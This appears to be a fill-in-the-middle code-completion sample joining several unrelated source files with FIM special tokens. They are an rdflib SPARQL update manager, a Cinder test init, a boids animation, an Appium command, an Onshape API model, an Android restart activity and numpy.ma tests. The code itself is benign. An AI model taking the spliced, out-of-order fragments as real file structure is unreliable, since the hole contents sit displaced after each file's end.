console.log(' websocket open')
retryTimeout = 1500 // reset timeout to fast on success
this.send('sub ' + doc.uri)
if (retries) {
console.log('Web socket has been down, better check for any news.')
updater.requestDownstreamAction(doc, theHandler)
}
}
var control = self.patchControlFor(doc)
control.upstreamCount = 0
// https://developer.mozilla.org/en-US/docs/Web/API/CloseEvent
//
// 1000 CLOSE_NORMAL Normal closure; the connection successfully completed whatever purpose for which it was created.
// 1001 CLOSE_GOING_AWAY The endpoint is going away, either
// because of a server failure or because the browser is navigating away from the page that opened the connection.
// 1002 CLOSE_PROTOCOL_ERROR The endpoint is terminating the connection due to a protocol error.
// 1003 CLOSE_UNSUPPORTED The connection is being terminated because the endpoint
// received data of a type it cannot accept (for example, a text-only endpoint received binary data).
// 1004 Reserved. A meaning might be defined in the future.
// 1005 CLOSE_NO_STATUS Reserved. Indicates that no status code was provided even though one was expected.
    // 1006 CLOSE_ABNORMAL Reserved. Used to indicate that a connection was closed abnormally (that is, with no close frame being sent) when a status code is expected.
//
//
socket.onclose = function (event) {
      console.log('*** Websocket closed with code ' + event.code +
        ", reason '" + event.reason + "' wasClean = " + event.wasClean)
retryTimeout *= 2
retries += 1
console.log('Retrying in ' + retryTimeout + 'ms') // (ask user?)
setTimeout(function () {
console.log('Trying websocket again')
openWebsocket()
}, retryTimeout)
}
socket.onmessage = function (msg) {
if (msg.data && msg.data.slice(0, 3) === 'pub') {
if ('upstreamCount' in control) {
control.upstreamCount -= 1
if (control.upstreamCount >= 0) {
console.log('just an echo: ' + control.upstreamCount)
return // Just an echo
}
}
console.log('Assume a real downstream change: ' + control.upstreamCount + ' -> 0')
control.upstreamCount = 0
self.requestDownstreamAction(doc, theHandler)
}
}
} // openWebsocket
openWebsocket()
return true
}
// This high-level function updates the local store iff the web is changed successfully.
//
// - deletions, insertions may be undefined or single statements or lists or formulae.
// (may contain bnodes which can be indirectly identified by a where clause)
//
// - callback is called as callback(uri, success, errorbody, xhr)
//
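// Typical call (a sketch; st is an existing statement in the store and
// newSt a replacement statement in the same document):
//   updater.update([st], [newSt], function (uri, ok, errorBody) {
//     if (!ok) console.log('Update failed: ' + errorBody)
//   })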
sparql.prototype.update = function (deletions, insertions, callback) {
try {
var kb = this.store
var ds = !deletions ? []
: deletions instanceof IndexedFormula ? deletions.statements
: deletions instanceof Array ? deletions : [ deletions ]
var is = !insertions ? []
: insertions instanceof IndexedFormula ? insertions.statements
: insertions instanceof Array ? insertions : [ insertions ]
if (!(ds instanceof Array)) {
throw new Error('Type Error ' + (typeof ds) + ': ' + ds)
}
if (!(is instanceof Array)) {
throw new Error('Type Error ' + (typeof is) + ': ' + is)
}
if (ds.length === 0 && is.length === 0) {
return callback(null, true) // success -- nothing needed to be done.
}
var doc = ds.length ? ds[0].why : is[0].why
var control = this.patchControlFor(doc)
var startTime = Date.now()
var props = ['subject', 'predicate', 'object', 'why']
var verbs = ['insert', 'delete']
var clauses = { 'delete': ds, 'insert': is }
verbs.map(function (verb) {
clauses[verb].map(function (st) {
        if (!doc.sameTerm(st.why)) {
          throw new Error('update: destination ' + doc +
            ' inconsistent with ' + verb + ' quad ' + st.why)
}
props.map(function (prop) {
if (typeof st[prop] === 'undefined') {
throw new Error('update: undefined ' + prop + ' of statement.')
}
})
})
})
var protocol = this.editable(doc.uri, kb)
if (!protocol) {
throw new Error("Can't make changes in uneditable " + doc)
}
var i
var newSts
var documentString
var sz
if (protocol.indexOf('SPARQL') >= 0) {
var bnodes = []
if (ds.length) bnodes = this._statement_array_bnodes(ds)
if (is.length) bnodes = bnodes.concat(this._statement_array_bnodes(is))
var context = this._bnode_context(bnodes, doc)
var whereClause = this._context_where(context)
var query = ''
if (whereClause.length) { // Is there a WHERE clause?
if (ds.length) {
query += 'DELETE { '
for (i = 0; i < ds.length; i++) {
query += this.anonymizeNT(ds[i]) + '\n'
}
query += ' }\n'
}
if (is.length) {
query += 'INSERT { '
for (i = 0; i < is.length; i++) {
query += this.anonymizeNT(is[i]) + '\n'
}
query += ' }\n'
}
query += whereClause
} else { // no where clause
if (ds.length) {
query += 'DELETE DATA { '
for (i = 0; i < ds.length; i++) {
query += this.anonymizeNT(ds[i]) + '\n'
}
query += ' } \n'
}
if (is.length) {
if (ds.length) query += ' ; '
query += 'INSERT DATA { '
for (i = 0; i < is.length; i++) {
query += this.anonymizeNT(is[i]) + '\n'
}
query += ' }\n'
}
}
      // Track pending upstream patches until they have finished their callback
control.pendingUpstream = control.pendingUpstream ? control.pendingUpstream + 1 : 1
if ('upstreamCount' in control) {
control.upstreamCount += 1 // count changes we originated ourselves
console.log('upstream count up to : ' + control.upstreamCount)
}
this._fire(doc.uri, query,
function (uri, success, body, xhr) {
xhr.elapsedTime_ms = Date.now() - startTime
console.log(' sparql: Return ' + (success ? 'success' : 'FAILURE ' + xhr.status) +
' elapsed ' + xhr.elapsedTime_ms + 'ms')
if (success) {
try {
kb.remove(ds)
} catch (e) {
success = false
body = 'Remote Ok BUT error deleting ' + ds.length + ' from store!!! ' + e
} // Add in any case -- help recover from weirdness??
for (var i = 0; i < is.length; i++) {
kb.add(is[i].subject, is[i].predicate, is[i].object, doc)
}
}
callback(uri, success, body, xhr)
control.pendingUpstream -= 1
// When upstream patches have been sent, reload state if downstream waiting
if (control.pendingUpstream === 0 && control.downstreamAction) {
var downstreamAction = control.downstreamAction
delete control.downstreamAction
console.log('delayed downstream action:')
downstreamAction(doc)
}
})
} else if (protocol.indexOf('DAV') >= 0) {
// The code below is derived from Kenny's UpdateCenter.js
var request = kb.any(doc, this.ns.link('request'))
if (!request) {
throw new Error('No record of our HTTP GET request for document: ' +
doc)
} // should not happen
var response = kb.any(request, this.ns.link('response'))
if (!response) {
return null // throw "No record HTTP GET response for document: "+doc
}
var content_type = kb.the(response, this.ns.httph('content-type')).value
// prepare contents of revised document
newSts = kb.statementsMatching(undefined, undefined, undefined, doc).slice() // copy!
for (i = 0; i < ds.length; i++) {
Util.RDFArrayRemove(newSts, ds[i])
}
for (i = 0; i < is.length; i++) {
newSts.push(is[i])
}
      // serialize to the appropriate format
sz = Serializer(kb)
sz.suggestNamespaces(kb.namespaces)
sz.setBase(doc.uri) // ?? beware of this - kenny (why? tim)
switch (content_type) {
case 'application/rdf+xml':
documentString = sz.statementsToXML(newSts)
break
case 'text/n3':
case 'text/turtle':
case 'application/x-turtle': // Legacy
case 'application/n3': // Legacy
documentString = sz.statementsToN3(newSts)
break
default:
throw new Error('Content-type ' + content_type + ' not supported for data write')
}
// Write the new version back
      var candidateTarget = kb.the(response, this.ns.httph('content-location'))
      var targetURI = doc.uri // default: write back to the document itself
      if (candidateTarget) {
        targetURI = uriJoin(candidateTarget.value, targetURI)
      }
var xhr = Util.XMLHTTPFactory()
xhr.options = {}
xhr.onreadystatechange = function () {
if (xhr.readyState === 4) {
// formula from sparqlUpdate.js, what about redirects?
var success = (!xhr.status || (xhr.status >= 200 && xhr.status < 300))
if (success) {
for (var i = 0; i < ds.length; i++) {
kb.remove(ds[i])
}
for (i = 0; i < is.length; i++) {
kb.add(is[i].subject, is[i].predicate, is[i].object, doc)
}
}
callback(doc.uri, success, xhr.responseText)
}
}
xhr.open('PUT', targetURI, true)
// assume the server does PUT content-negotiation.
xhr.setRequestHeader('Content-type', content_type) // OK?
xhr.send(documentString)
} else {
if (protocol.indexOf('LOCALFILE') >= 0) {
try {
console.log('Writing back to local file\n')
// See http://simon-jung.blogspot.com/2007/10/firefox-extension-file-io.html
// prepare contents of revised document
newSts = kb.statementsMatching(undefined, undefined, undefined, doc).slice() // copy!
for (i = 0; i < ds.length; i++) {
Util.RDFArrayRemove(newSts, ds[i])
}
for (i = 0; i < is.length; i++) {
newSts.push(is[i])
}
// serialize to the appropriate format
sz = Serializer(kb)
sz.suggestNamespaces(kb.namespaces)
sz.setBase(doc.uri) // ?? beware of this - kenny (why? tim)
var dot = doc.uri.lastIndexOf('.')
if (dot < 1) {
throw new Error('Rewriting file: No filename extension: ' + doc.uri)
}
var ext = doc.uri.slice(dot + 1)
switch (ext) {
case 'rdf':
            case 'owl': // Just my experience ... @@ we should keep the format in which it was parsed
case 'xml':
documentString = sz.statementsToXML(newSts)
break
case 'n3':
case 'nt':
case 'ttl':
documentString = sz.statementsToN3(newSts)
break
default:
throw new Error('File extension .' + ext + ' not supported for data write')
}
// Write the new version back
// create component for file writing
console.log('Writing back: <<<' + documentString + '>>>')
var filename = doc.uri.slice(7) // chop off file:// leaving /path
// console.log("Writeback: Filename: "+filename+"\n")
var file = Components.classes['@mozilla.org/file/local;1']
.createInstance(Components.interfaces.nsILocalFile)
file.initWithPath(filename)
if (!file.exists()) {
throw new Error('Rewriting file <' + doc.uri +
'> but it does not exist!')
}
// {
// file.create( Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 420)
// }
// create file output stream and use write/create/truncate mode
// 0x02 writing, 0x08 create file, 0x20 truncate length if exist
var stream = Components.classes['@mozilla.org/network/file-output-stream;1']
.createInstance(Components.interfaces.nsIFileOutputStream)
          // Various JS systems object to the 0666 literal in strict mode as dangerous
stream.init(file, 0x02 | 0x08 | 0x20, parseInt('0666', 8), 0)
// write data to file then close output stream
stream.write(documentString, documentString.length)
stream.close()
for (i = 0; i < ds.length; i++) {
kb.remove(ds[i])
}
for (i = 0; i < is.length; i++) {
kb.add(is[i].subject, is[i].predicate, is[i].object, doc)
}
callback(doc.uri, true, '') // success!
} catch (e) {
callback(doc.uri, false,
'Exception trying to write back file <' + doc.uri + '>\n'
// + tabulator.Util.stackString(e))
)
}
} else {
throw new Error("Unhandled edit method: '" + protocol + "' for " + doc)
}
}
} catch (e) {
callback(undefined, false, 'Exception in update: ' + e + '\n' + $rdf.Util.stackString(e))
}
} // end update
// This is suitable for an initial creation of a document
//
// data: string, or array of statements
//
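// Example (sketch): write a fresh Turtle document from an array of statements
//   updater.put(doc, sts, 'text/turtle', function (uri, ok, errorBody, xhr) {
//     if (!ok) console.log('PUT failed: ' + errorBody)
//   })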
sparql.prototype.put = function (doc, data, content_type, callback) {
var documentString
var kb = this.store
  if (typeof data === 'string') {
documentString = data
} else {
    // serialize to the appropriate format
var sz = Serializer(kb)
sz.suggestNamespaces(kb.namespaces)
sz.setBase(doc.uri)
switch (content_type) {
case 'application/rdf+xml':
documentString = sz.statementsToXML(data)
break
case 'text/n3':
case 'text/turtle':
case 'application/x-turtle': // Legacy
case 'application/n3': // Legacy
documentString = sz.statementsToN3(data)
break
default:
throw new Error('Content-type ' + content_type +
' not supported for data PUT')
}
}
var xhr = Util.XMLHTTPFactory()
xhr.options = {}
xhr.onreadystatechange = function () {
if (xhr.readyState === 4) {
// formula from sparqlUpdate.js, what about redirects?
var success = (!xhr.status || (xhr.status >= 200 && xhr.status < 300))
if (success && typeof data !== 'string') {
data.map(function (st) {
kb.addStatement(st)
})
// kb.fetcher.requested[doc.uri] = true // as though fetched
}
if (success) {
delete kb.fetcher.nonexistant[doc.uri]
delete kb.fetcher.requested[doc.uri]
        // @@ later we can fake it has been requested if PUT gives us the headers and we save them.
}
callback(doc.uri, success, xhr.responseText, xhr)
}
}
xhr.open('PUT', doc.uri, true)
xhr.setRequestHeader('Content-type', content_type)
xhr.send(documentString)
}
// Reload a document.
//
// Fast and cheap, no metadata
// Measure times for the document
// Load it provisionally
// Don't delete the statements before the load, or it will leave a broken document
// in the meantime.
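// e.g. (sketch):
//   updater.reload(updater.store, doc, function (ok, message) {
//     if (!ok) console.log('Reload failed: ' + message)
//   })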
sparql.prototype.reload = function (kb, doc, callback) {
var startTime = Date.now()
  // force: true sets no-cache so we always fetch a fresh copy
kb.fetcher.nowOrWhenFetched(doc.uri, {force: true, noMeta: true, clearPreviousData: true}, function (ok, body, xhr) {
if (!ok) {
console.log(' ERROR reloading data: ' + body)
callback(false, 'Error reloading data: ' + body, xhr)
} else if (xhr.onErrorWasCalled || xhr.status !== 200) {
console.log(' Non-HTTP error reloading data! onErrorWasCalled=' +
xhr.onErrorWasCalled + ' status: ' + xhr.status)
callback(false, 'Non-HTTP error reloading data: ' + body, xhr)
} else {
var elapsedTime_ms = Date.now() - startTime
if (!doc.reloadTime_total) doc.reloadTime_total = 0
if (!doc.reloadTime_count) doc.reloadTime_count = 0
doc.reloadTime_total += elapsedTime_ms
doc.reloadTime_count += 1
console.log(' Fetch took ' + elapsedTime_ms + 'ms, av. of ' +
doc.reloadTime_count + ' = ' +
(doc.reloadTime_total / doc.reloadTime_count) + 'ms.')
callback(true)
}
})
}
sparql.prototype.oldReload = function (kb, doc, callback) {
var g2 = graph() // A separate store to hold the data as we load it
var f2 = fetcher(g2)
var startTime = Date.now()
  // force: true sets no-cache so we always fetch a fresh copy
f2.nowOrWhenFetched(doc.uri, {force: true, noMeta: true, clearPreviousData: true}, function (ok, body, xhr) {
if (!ok) {
console.log(' ERROR reloading data: ' + body)
callback(false, 'Error reloading data: ' + body, xhr)
} else if (xhr.onErrorWasCalled || xhr.status !== 200) {
console.log(' Non-HTTP error reloading data! onErrorWasCalled=' +
xhr.onErrorWasCalled + ' status: ' + xhr.status)
callback(false, 'Non-HTTP error reloading data: ' + body, xhr)
} else {
var sts1 = kb.statementsMatching(undefined, undefined, undefined, doc).slice() // Take a copy!!
var sts2 = g2.statementsMatching(undefined, undefined, undefined, doc).slice()
console.log(' replacing ' + sts1.length + ' with ' + sts2.length +
' out of total statements ' + kb.statements.length)
kb.remove(sts1)
kb.add(sts2)
var elapsedTime_ms = Date.now() - startTime
      if (sts2.length === 0) {
        console.log('Warning: reload of ' + doc + ' returned zero statements')
      }
if (!doc.reloadTime_total) doc.reloadTime_total = 0
if (!doc.reloadTime_count) doc.reloadTime_count = 0
doc.reloadTime_total += elapsedTime_ms
doc.reloadTime_count += 1
console.log(' fetch took ' + elapsedTime_ms + 'ms, av. of ' + doc.reloadTime_count + ' = ' +
(doc.reloadTime_total / doc.reloadTime_count) + 'ms.')
callback(true)
}
})
}
return sparql
})()
module.exports = UpdateManager<|fim▁end|>
|
}
console.log('sparql.editable: inconclusive for ' + uri + '\n')
return undefined // We don't know (yet) as we haven't had a response (yet)
}
|
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.<|fim▁hole|># a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
:mod:`cinder.tests` -- Cinder Unittests
=====================================================
.. automodule:: cinder.tests
:platform: Unix
.. moduleauthor:: Jesse Andrews <[email protected]>
.. moduleauthor:: Devin Carlen <[email protected]>
.. moduleauthor:: Vishvananda Ishaya <[email protected]>
.. moduleauthor:: Joshua McKenty <[email protected]>
.. moduleauthor:: Manish Singh <[email protected]>
.. moduleauthor:: Andy Smith <[email protected]>
"""
import eventlet
eventlet.monkey_patch()
# See http://code.google.com/p/python-nose/issues/detail?id=373
# The code below enables nosetests to work with i18n _() blocks
import __builtin__
setattr(__builtin__, '_', lambda x: x)<|fim▁end|>
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
|
<|file_name|>boid.js<|end_file_name|><|fim▁begin|>var width = window.innerWidth,
height = window.innerHeight,
boids = [],
destination,
canvas,
context;
const MAX_NUMBER = 100;
const MAX_SPEED = 1;
const radius = 5;
init();
animation();
function init(){
canvas = document.getElementById('canvas'),
context = canvas.getContext( "2d" );
canvas.width = width;
canvas.height = height;
destination = {
x:Math.random()*width,
y:Math.random()*height
};
for (var i = 0; i <MAX_NUMBER; i++) {
boids[i] = new Boid();
};
}
var _animation;
function animation(){
_animation = requestAnimationFrame(animation);
context.clearRect(0,0,width,height);
for (var i = 0; i < boids.length; i++) {
boids[i].rule1();
boids[i].rule2();
boids[i].rule3();
boids[i].rule4();
boids[i].rule5();
boids[i].rule6();
var nowSpeed = Math.sqrt(boids[i].vx * boids[i].vx + boids[i].vy * boids[i].vy );
if(nowSpeed > MAX_SPEED){
boids[i].vx *= MAX_SPEED / nowSpeed;
boids[i].vy *= MAX_SPEED / nowSpeed;
}
boids[i].x += boids[i].vx;
boids[i].y += boids[i].vy;
drawCircle(boids[i].x,boids[i].y);
drawVector(boids[i].x,boids[i].y,boids[i].vx,boids[i].vy);
};
}
/*
//mouseEvent
document.onmousemove = function (event){
destination ={
x:event.screenX,
y:event.screenY
}
};
*/
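// Each Boid applies six steering rules per animation frame. Rules 1-3 are
// the classic Reynolds flocking rules (cohesion, separation, alignment);
// rules 4-6 add wall avoidance, a pull toward a destination, and a chase
// behaviour, as labelled below.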
function Boid(){
this.x = Math.random()*width;
this.y = Math.random()*height;
this.vx = 0.0;
this.vy = 0.0;
this.dx = Math.random()*width;
this.dy = Math.random()*height;
  // Rule 1 (cohesion): steer toward the centre of the flock
this.rule1 = function(){
var centerx = 0,
centery = 0;
for (var i = 0; i < boids.length; i++) {
if (boids[i] != this) {
centerx += boids[i].x;
centery += boids[i].y;
};
};
centerx /= MAX_NUMBER-1;
centery /= MAX_NUMBER-1;
this.vx += (centerx-this.x)/1000;
this.vy += (centery-this.y)/1000;
}
  // Rule 2 (separation): move away from other boids that get too close
this.rule2 = function(){
var _vx = 0,
_vy = 0;
for (var i = 0; i < boids.length; i++) {
if(this != boids[i]){
var distance = distanceTo(this.x,boids[i].x,this.y,boids[i].y);
if(distance<25){
distance += 0.001;
_vx -= (boids[i].x - this.x)/distance;
_vy -= (boids[i].y - this.y)/distance;
//this.dx = -boids[i].x;
//this.dy = -boids[i].y;
}
}
};
this.vx += _vx;
this.vy += _vy;
}
  // Rule 3 (alignment): try to match the average velocity of the other boids
this.rule3 = function(){
var _pvx = 0,
_pvy = 0;
for (var i = 0; i < boids.length; i++) {
if (boids[i] != this) {
_pvx += boids[i].vx;
_pvy += boids[i].vy;
}
};
_pvx /= MAX_NUMBER-1;
_pvy /= MAX_NUMBER-1;
this.vx += (_pvx - this.vx)/10;
this.vy += (_pvy - this.vy)/10;
};
  // Rule 4: behaviour near the walls (steer back into the canvas)
this.rule4 = function(){
if(this.x < 10 && this.vx < 0)this.vx += 10/(Math.abs( this.x ) + 1 );
if(this.x > width && this.vx > 0)this.vx -= 10/(Math.abs( width - this.x ) + 1 );
if (this.y < 10 && this.vy < 0)this.vy += 10/(Math.abs( this.y ) + 1 );
if(this.y > height && this.vy > 0)this.vy -= 10/(Math.abs( height - this.y ) + 1 );<|fim▁hole|>
  // Rule 5: head toward this boid's destination point
this.rule5 = function(){
var _dx = this.dx - this.x,
_dy = this.dy - this.y;
this.vx += (this.dx - this.x)/500;
this.vy += (this.dy - this.y)/500;
}
  // Rule 6: predation (chase nearby boids that have a different destination)
this.rule6 = function(){
var _vx = Math.random()-0.5,
_vy = Math.random()-0.5;
for (var i = 0; i < boids.length; i++) {
if(this != boids[i] && this.dx != boids[i].dx && this.dy != boids[i].dy){
var distance = distanceTo(this.x,boids[i].x,this.y,boids[i].y);
if(distance<20 && distance>15){
console.log(distance);
distance += 0.001;
_vx += (boids[i].x - this.x)/distance;
_vy += (boids[i].y - this.y)/distance;
drawLine(this.x,this.y,boids[i].x,boids[i].y);
this.dx = boids[i].dx;
this.dy = boids[i].dy;
}
}
};
this.vx += _vx;
this.vy += _vy;
}
}
function distanceTo(x1,x2,y1,y2){
var dx = x2-x1,
dy = y2-y1;
return Math.sqrt(dx*dx+dy*dy);
}
function drawCircle(x,y){
context.beginPath();
context.strokeStyle = "#fff";
context.arc(x,y,radius,0,Math.PI*2,false);
context.stroke();
}
const VectorLong = 10;
function drawVector(x,y,vx,vy){
context.beginPath();
var pointx = x+vx*VectorLong;
var pointy = y+vy*VectorLong;
context.moveTo(x,y);
context.lineTo(pointx,pointy);
context.stroke();
}
function drawLine(x1,y1,x2,y2){
context.beginPath();
context.moveTo(x1,y1);
context.lineTo(x2,y2);
context.stroke();
}<|fim▁end|>
|
};
|
<|file_name|>startActivity.js<|end_file_name|><|fim▁begin|>'use strict';
Object.defineProperty(exports, "__esModule", {
value: true
});
var _ErrorHandler = require('../utils/ErrorHandler');
var startActivity = function startActivity(appPackage, appActivity) {
if (typeof appPackage !== 'string' || typeof appActivity !== 'string') {
    throw new _ErrorHandler.ProtocolError('startActivity command requires two parameters (appPackage, appActivity) of type string');
}
return this.requestHandler.create('/session/:sessionId/appium/device/start_activity', { appPackage: appPackage, appActivity: appActivity });
}; /**
*
* Start an arbitrary Android activity during a session.
*
* <example>
:startActivity.js
browser.startActivity({
appPackage: 'io.appium.android.apis',<|fim▁hole|> });
* </example>
*
* @param {String} appPackage name of app
* @param {String} appActivity name of activity
* @type mobile
* @for android
*
*/
exports.default = startActivity;
module.exports = exports['default'];<|fim▁end|>
|
appActivity: '.view.DragAndDropDemo'
|
<|file_name|>bt_default_unit_info.py<|end_file_name|><|fim▁begin|># coding: utf-8
"""
Onshape REST API
The Onshape REST API consumed by all clients. # noqa: E501
The version of the OpenAPI document: 1.113
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
class BTDefaultUnitInfo(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"key": (str,), # noqa: E501
"value": (str,), # noqa: E501
}
@staticmethod
def discriminator():
return None
attribute_map = {
"key": "key", # noqa: E501
"value": "value", # noqa: E501
}
@staticmethod
def _composed_schemas():
return None
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
]<|fim▁hole|>
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""bt_default_unit_info.BTDefaultUnitInfo - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
key (str): [optional] # noqa: E501
value (str): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)<|fim▁end|>
|
)
|
<|file_name|>ClearStack.java<|end_file_name|><|fim▁begin|>package cat.ereza.customactivityoncrash.activity;
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import cat.ereza.customactivityoncrash.CustomActivityOnCrash;
/**<|fim▁hole|>{
@Override
protected void onCreate(Bundle savedInstanceState)
{
super.onCreate(savedInstanceState);
Intent intent = getIntent().getParcelableExtra(CustomActivityOnCrash.KEY_CURRENT_INTENT);
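        // Restart the app: relaunch the intent captured at crash time,
        // drop this helper activity from the back stack, and hard-exit the
        // process so no corrupted state survives into the restarted app.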
startActivity(intent);
finish();
Runtime.getRuntime().exit(0);
}
}<|fim▁end|>
|
* Created by zhy on 15/8/4.
*/
public class ClearStack extends Activity
|
<|file_name|>login-status.enum.ts<|end_file_name|><|fim▁begin|>export enum LoginStatus {
AUTHENTICATED = 1,
NOT_AUTHENTICATED,
FORM_ERRORS,
SERVER_ERROR<|fim▁hole|><|fim▁end|>
|
}
|
<|file_name|>test_core.py<|end_file_name|><|fim▁begin|># pylint: disable-msg=W0401,W0511,W0611,W0612,W0614,R0201,E1102
"""Tests suite for MaskedArray & subclassing.
:author: Pierre Gerard-Marchant
:contact: pierregm_at_uga_dot_edu
"""
from __future__ import division, absolute_import, print_function
__author__ = "Pierre GF Gerard-Marchant"
import warnings
import pickle
import operator
from functools import reduce
import numpy as np
import numpy.ma.core
import numpy.core.fromnumeric as fromnumeric
import numpy.core.umath as umath
from numpy.testing import TestCase, run_module_suite, assert_raises
from numpy import ndarray
from numpy.compat import asbytes, asbytes_nested
from numpy.ma.testutils import (
assert_, assert_array_equal, assert_equal, assert_almost_equal,
assert_equal_records, fail_if_equal, assert_not_equal,
assert_mask_equal,
)
from numpy.ma.core import (
MAError, MaskError, MaskType, MaskedArray, abs, absolute, add, all,
allclose, allequal, alltrue, angle, anom, arange, arccos, arctan2,
arcsin, arctan, argsort, array, asarray, choose, concatenate,
conjugate, cos, cosh, count, default_fill_value, diag, divide, empty,
empty_like, equal, exp, flatten_mask, filled, fix_invalid,
flatten_structured_array, fromflex, getmask, getmaskarray, greater,
greater_equal, identity, inner, isMaskedArray, less, less_equal, log,
log10, make_mask, make_mask_descr, mask_or, masked, masked_array,
masked_equal, masked_greater, masked_greater_equal, masked_inside,
masked_less, masked_less_equal, masked_not_equal, masked_outside,
masked_print_option, masked_values, masked_where, max, maximum,
maximum_fill_value, min, minimum, minimum_fill_value, mod, multiply,
mvoid, nomask, not_equal, ones, outer, power, product, put, putmask,
ravel, repeat, reshape, resize, shape, sin, sinh, sometrue, sort, sqrt,
subtract, sum, take, tan, tanh, transpose, where, zeros,
)
pi = np.pi
class TestMaskedArray(TestCase):
# Base test class for MaskedArrays.
def setUp(self):
# Base data definition.
x = np.array([1., 1., 1., -2., pi/2.0, 4., 5., -10., 10., 1., 2., 3.])
y = np.array([5., 0., 3., 2., -1., -4., 0., -10., 10., 1., 0., 3.])
a10 = 10.
m1 = [1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]
m2 = [0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 1]
xm = masked_array(x, mask=m1)
ym = masked_array(y, mask=m2)
z = np.array([-.5, 0., .5, .8])
zm = masked_array(z, mask=[0, 1, 0, 0])
xf = np.where(m1, 1e+20, x)
xm.set_fill_value(1e+20)
self.d = (x, y, a10, m1, m2, xm, ym, z, zm, xf)
def test_basicattributes(self):
# Tests some basic array attributes.
a = array([1, 3, 2])
b = array([1, 3, 2], mask=[1, 0, 1])
assert_equal(a.ndim, 1)
assert_equal(b.ndim, 1)
assert_equal(a.size, 3)
assert_equal(b.size, 3)
assert_equal(a.shape, (3,))
assert_equal(b.shape, (3,))
def test_basic0d(self):
# Checks masking a scalar
x = masked_array(0)
assert_equal(str(x), '0')
x = masked_array(0, mask=True)
assert_equal(str(x), str(masked_print_option))
x = masked_array(0, mask=False)
assert_equal(str(x), '0')
x = array(0, mask=1)
self.assertTrue(x.filled().dtype is x._data.dtype)
def test_basic1d(self):
# Test of basic array creation and properties in 1 dimension.
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
self.assertTrue(not isMaskedArray(x))
self.assertTrue(isMaskedArray(xm))
self.assertTrue((xm - ym).filled(0).any())
fail_if_equal(xm.mask.astype(int), ym.mask.astype(int))
s = x.shape
assert_equal(np.shape(xm), s)
assert_equal(xm.shape, s)
assert_equal(xm.dtype, x.dtype)
assert_equal(zm.dtype, z.dtype)
assert_equal(xm.size, reduce(lambda x, y:x * y, s))
assert_equal(count(xm), len(m1) - reduce(lambda x, y:x + y, m1))
assert_array_equal(xm, xf)
assert_array_equal(filled(xm, 1.e20), xf)
assert_array_equal(x, xm)
def test_basic2d(self):
# Test of basic array creation and properties in 2 dimensions.
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
for s in [(4, 3), (6, 2)]:
x.shape = s
y.shape = s
xm.shape = s
ym.shape = s
xf.shape = s
self.assertTrue(not isMaskedArray(x))
self.assertTrue(isMaskedArray(xm))
assert_equal(shape(xm), s)
assert_equal(xm.shape, s)
assert_equal(xm.size, reduce(lambda x, y:x * y, s))
assert_equal(count(xm), len(m1) - reduce(lambda x, y:x + y, m1))
assert_equal(xm, xf)
assert_equal(filled(xm, 1.e20), xf)
assert_equal(x, xm)
def test_concatenate_basic(self):
# Tests concatenations.
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
# basic concatenation
assert_equal(np.concatenate((x, y)), concatenate((xm, ym)))
assert_equal(np.concatenate((x, y)), concatenate((x, y)))
assert_equal(np.concatenate((x, y)), concatenate((xm, y)))
assert_equal(np.concatenate((x, y, x)), concatenate((x, ym, x)))
def test_concatenate_alongaxis(self):
# Tests concatenations.
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
# Concatenation along an axis
s = (3, 4)
x.shape = y.shape = xm.shape = ym.shape = s
assert_equal(xm.mask, np.reshape(m1, s))
assert_equal(ym.mask, np.reshape(m2, s))
xmym = concatenate((xm, ym), 1)
